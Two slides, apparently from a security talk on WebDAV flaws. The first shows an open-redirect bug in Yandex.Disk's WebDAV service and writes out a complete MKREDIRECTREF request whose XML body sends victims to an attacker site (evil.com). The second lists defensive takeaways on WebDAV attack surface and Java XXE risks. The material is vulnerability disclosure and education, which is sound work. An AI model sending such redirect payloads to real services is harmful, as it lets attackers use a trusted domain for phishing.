  • 16. Yandex.Disk invalidated redirect ▶ WebDav access to Yandex.Disk – http://webdav.yandex.ru ▶ Supports MKREDIRECTREF request ▶ It is possible to create resource that will redirect the victim from Yandex.Disk to arbitrary site MKREDIRECTREF /good.txt HTTP/1.1 Host: webdav.yandex.ru <?xml version="1.0" encoding="utf-8" ?> <D:mkredirectref xmlns:D="DAV:"> <D:reftarget> <D:href>http://evil.com</D:href> </D:reftarget> </D:mkredirectref>
  • 17. Takeaways ▶ WebDav is a complex protocol, it extends attack surface of your system ▶ WebDav-related RFCs have security considerations parts, unfortunately, many WebDav implementations ignore security considerations ▶ WebDav libraries in Java suffers from XXE issues, because most XML parsers in Java are insecure in default configuration